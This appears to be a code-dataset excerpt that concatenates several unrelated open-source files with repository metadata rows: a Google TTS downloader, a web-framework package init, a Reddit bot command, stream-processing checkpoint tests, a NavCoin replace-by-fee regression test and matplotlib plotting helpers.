#val could be >max_length
combined_text.extend(split_text_rec(val, regexps, max_length))
return combined_text
return split_text_rec(input_text.replace('\n', ''),
['([\,|\.|;]+)', '( )'])
audio_args = namedtuple('audio_args',['language','output'])
def audio_extract(input_text='',args=None):
# This accepts :
# a dict,
# an audio_args named tuple
# or arg parse object
if args is None:
args = audio_args(language='en',output=open('output/output.mp3', 'w'))
if type(args) is dict:
args = audio_args(
language=args.get('language','en'),
output=open(args.get('output','output/output.mp3'), 'w')
)
#process input_text into chunks
#Google TTS only accepts up to (and including) 100 characters long texts.
#Split the text in segments of maximum 100 characters long.
combined_text = split_text(input_text)
#download chunks and write them to the output file
for idx, val in enumerate(combined_text):
mp3url = "http://translate.google.com/translate_tts?tl=%s&q=%s&total=%s&idx=%s" % (
args.language,
urllib.quote(val),
len(combined_text),
idx)
headers = {"Host": "translate.google.com",
"Referer": "http://www.gstatic.com/translate/sound_player2.swf",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) "
"AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.163 Safari/535.19"
}
req = urllib2.Request(mp3url, '', headers)
sys.stdout.write('.')
sys.stdout.flush()
if len(val) > 0:
try:
response = urllib2.urlopen(req)
args.output.write(response.read())
time.sleep(.5)
except urllib2.URLError as e:
print ('%s' % e)
args.output.close()
print('Saved MP3 to %s' % args.output.name)
def text_to_speech_mp3_argparse():
description = 'Google TTS Downloader.'
parser = argparse.ArgumentParser(description=description,
epilog='tunnel snakes rule')
parser.add_argument('-o', '--output',
action='store', nargs='?',
help='Filename to output audio to',
type=argparse.FileType('wb'), default='output/output.mp3')
parser.add_argument('-l', '--language',
action='store',
nargs='?',
help='Language to output text to.', default='en')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', '--file',
type=argparse.FileType('r'),
help='File to read text from.')
group.add_argument('-s', '--string',
action='store',
nargs='+',
help='A string of text to convert to speech.')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
print parser.parse_args()
return parser.parse_args()
if __name__ == "__main__":
args = text_to_speech_mp3_argparse()
if args.file:
input_text = args.file.read()
if args.string:
input_text = ' '.join(map(str, args.string))
audio_extract(input_text=input_text, args=args)
commands.getstatusoutput("mpg123 output/output.mp3")
| apache-2.0 | 6,340,551,672,910,915,000 | 37.917808 | 91 | 0.567054 | false |
petrvanblokland/Xierpa3 | xierpa3/components/__init__.py | 1 | 1520 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
from component import Component
from text import Text
from title import Title
from header import Header
from footer import Footer
from container import Container
from column import Column
from group import Group, ItemGroup # Group of floating rows
from menu import Menu
from logo import Logo
from page import Page
from article import Article, ArticleSideBar, ArticlesList
from sidebar import Sidebar
from navigation import Navigation, MobileNavigation
from tagcloud import TagCloud
from message import Message
from theme import Theme
from ruler import Ruler
from socialmedia import SocialMedia
from documentation import Documentation
from nothing import Nothing # Place holder component doing nothing. Can be used for debugging.
# Featured components
from featured.featuredbyimage import FeaturedByImage
from featured.featuredbyimagelist import FeaturedByImageList
from featured.featuredbytext import FeaturedByText
from featured.featuredbydiaptext import FeaturedByDiapText
from featured.posterhead import PosterHead
# Deprecated. Used featured.Featured instead
#from featured import FeaturedByImage, FeaturedByImageList, FeaturedByDiapText, FeaturedByText, FeaturedByTextList
| mit | -4,814,037,770,809,593,000 | 37 | 114 | 0.736184 | false |
c17r/TagTrain | src/tagtrain/tagtrain/tt_unblacklist.py | 1 | 1281 | from tagtrain import data
from tagtrain.tagtrain import TagTrainResponse, C_MEMBER, C_GROUP
class UnBlacklist(TagTrainResponse):
TYPE = TagTrainResponse.TYPE_COMMENTORMESSAGE
CMD_REGEX = f'unblacklist {C_MEMBER} {C_GROUP}?'
HELP_TEXT = ("`u/{botname} unblacklist <member-name> [<group-name>]` - "
"Allows previously blacklisted specified Member to add themselves, either for all "
"your Groups or just specified Group")
def run(self, reply, message, match):
self.LOGGER.debug('blacklist')
owner_name = message.author.name
member_name = match.group('member')
group_name = match.group('group')
try:
data.by_owner.unblacklist_user(owner_name, member_name, group_name)
except data.Group.DoesNotExist:
reply.append(f'Group `{group_name}` does not exist. Skipping.')
return
except data.Blacklist.DoesNotExist:
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` does not exist. Skipping.')
return
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` removed.')
| mit | 5,373,507,038,095,940,000 | 40.322581 | 100 | 0.63388 | false |
IBMStreams/streamsx.topology | test/python/spl/tests/test_splpy_checkpointing.py | 1 | 4571 | import unittest
from datetime import timedelta
from streamsx.topology.topology import *
from streamsx.topology import schema
from streamsx.topology.tester import Tester
import streamsx.spl.op as op
import streamsx.spl.toolkit
from streamsx.topology.context import ConfigParams
import spl_tests_utils as stu
# Test checkpointing in python decorated operators.
# These tests run in a way that should cause checkpoints to be created,
# but do not actually verify that the checkpoints are created and does
# not even attempt to restore them.
# There should be at least one test for each type of python decorated
# operators: source, map, filter, for_each, primitive_operator
class TestCheckpointing(unittest.TestCase):
_multiprocess_can_split_ = True
@classmethod
def setUpClass(cls):
"""Extract Python operators in toolkit"""
stu._extract_tk('testtkpy')
def setUp(self):
Tester.setup_standalone(self)
# Source operator
def test_source(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
bop = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
# streamsx.topology.context.submit('TOOLKIT', topo)
s = bop.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.contents(s, list(zip(range(0,30))))
tester.test(self.test_ctxtype, self.test_config)
# Source, filter, and map operators
def test_filter_map(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
evenFilter = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::StatefulEvenFilter", timeCounter.stream, None, params={})
hpo = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::StatefulHalfPlusOne", evenFilter.stream, None, params={})
s = hpo.stream
tester = Tester(topo)
tester.tuple_count(s, 15)
tester.contents(s, list(zip(range(1,16))))
tester.test(self.test_ctxtype, self.test_config)
# source, primitive, and for_each operators
# this will fail to compile because checkpointing is not supported
# for python primitive operators.
@unittest.expectedFailure
def test_primitive_foreach(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
fizzbuzz = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::FizzBuzzPrimitive", timeCounter.stream, schema.StreamSchema('tuple<int32 f, rstring c>').as_tuple())
verify = op.Sink("com.ibm.streamsx.topology.pytest.checkpoint::Verify", fizzbuzz.stream)
s = fizzbuzz.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.test(self.test_ctxtype, self.test_config)
# source, map, and for_each operators
def test_map_foreach(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
fizzbuzz = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::FizzBuzzMap", timeCounter.stream, schema.StreamSchema('tuple<int32 f, rstring c>').as_tuple())
verify = op.Sink("com.ibm.streamsx.topology.pytest.checkpoint::Verify", fizzbuzz.stream)
s = fizzbuzz.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.test(self.test_ctxtype, self.test_config)
class TestDistributedCheckpointing(TestCheckpointing):
def setUp(self):
Tester.setup_distributed(self)
self.test_config[ConfigParams.SSL_VERIFY] = False
class TestSasCheckpointing(TestCheckpointing):
def setUp(self):
Tester.setup_streaming_analytics(self, force_remote_build=True)
| apache-2.0 | -4,023,316,734,859,502,000 | 46.123711 | 186 | 0.698972 | false |
navcoindev/navcoin-core | qa/rpc-tests/replace-by-fee.py | 1 | 21999 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test replace by fee code
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return bytes_to_hex_str(tx.serialize())
def make_utxo(node, amount, confirmed=True, scriptPubKey=CScript([1])):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
#print (node.getbalance(), amount, fee)
new_addr = node.getnewaddress()
#print new_addr
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
#print i, txout['scriptPubKey']['addresses']
if txout['scriptPubKey']['addresses'] == [new_addr]:
#print i
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransaction(txToHex(tx2))
txid = node.sendrawtransaction(signed_tx['hex'], True)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert(new_size < mempool_size)
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
class ReplaceByFeeTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-maxorphantx=1000", "-debug",
"-relaypriority=0", "-whitelist=127.0.0.1",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101"
]))
self.is_network_split = False
def run_test(self):
make_utxo(self.nodes[0], 1*COIN)
print("Running test simple doublespend...")
self.test_simple_doublespend()
print("Running test doublespend chain...")
self.test_doublespend_chain()
print("Running test doublespend tree...")
self.test_doublespend_tree()
print("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
print("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
print("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
print("Running test too many replacements...")
self.test_too_many_replacements()
print("Running test opt-in...")
self.test_opt_in()
print("Running test prioritised transactions...")
self.test_prioritised_transactions()
print("Passed\n")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# Extra 0.1 NAV fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
mempool = self.nodes[0].getrawmempool()
assert (tx1a_txid not in mempool)
assert (tx1b_txid in mempool)
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 NAV - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False) # transaction mistakenly accepted!
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert(doublespent_txid not in mempool)
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert(len(tx.serialize()) < 100000)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# 1 NAV fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n - 1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert (tx.hash not in mempool)
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2*fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1*COIN), CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1_hex = txToHex(tx1)
tx1_txid = self.nodes[0].sendrawtransaction(tx1_hex, True)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
actual_fee = initial_nValue - split_value*(MAX_REPLACEMENT_LIMIT+1)
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, True)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value-fee, CScript([b'a']))]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, True)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
try:
self.nodes[0].sendrawtransaction(double_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, True)
def test_opt_in(self):
""" Replacing should only work if orig tx opted in """
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
print(tx1b_txid)
assert(False)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx2b_hex = txToHex(tx2b)
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
self.nodes[0].sendrawtransaction(tx3a_hex, True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5*COIN), CScript([b'e']))]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5*COIN), CScript([b'f']))]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, True)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, True)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(tx1a_txid, 0, int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
assert(tx1b_txid in self.nodes[0].getrawmempool())
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01*COIN), CScript([b'a']))]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(tx2b.hash, 0, int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
assert(tx2b_txid in self.nodes[0].getrawmempool())
if __name__ == '__main__':
ReplaceByFeeTest().main()
| mit | 3,186,034,614,589,007,400 | 36.286441 | 105 | 0.581936 | false |
anetasie/sherpa | sherpa/astro/datastack/plot_backend/plot_matplotlib.py | 4 | 2185 | #
# Copyright (C) 2010, 2014, 2015 Smithsonian Astrophysical Observatory
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Plotting routines for the data stack module provided by matplotlib.
"""
import matplotlib.pyplot as plt
name = "pylab_backend"
def initialize_backend():
"""Ensure that the plotting backend is initialized.
"""
pass
def initialize_plot(dataset, ids):
"""Create the plot window or figure for the given dataset.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
select_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def select_plot(dataset, ids):
"""Select the plot window or figure for the given dataset.
The plot for this dataset is assumed to have been created.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
initialize_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def save_plot(*args, **kwargs):
"""Save the current plot."""
plt.savefig(*args, **kwargs)
# How is this different from the _print_window/savefig methods
# of the DataStack class?
plot_savefig = plt.savefig
plot_xlabel = plt.xlabel
plot_ylabel = plt.ylabel
plot_title = plt.title
plot_xlim = plt.xlim
plot_ylim = plt.ylim
plot_set_xscale = plt.xscale
plot_set_yscale = plt.yscale
| gpl-3.0 | 2,775,161,598,395,627,500 | 23.829545 | 74 | 0.684668 | false |
PetrGlad/hessianpy | hessian/server.py | 1 | 3978 | #
# Hessian protocol implementation
# This file contains simple RPC server code.
#
# Protocol specification can be found here:
# http://www.caucho.com/resin-3.0/protocols/hessian-1.0-spec.xtp
#
# Copyright 2006-2007 Petr Gladkikh (batyi at users sourceforge net)
#
# Licensed under the Apache License, Version 2.0 (the "License");
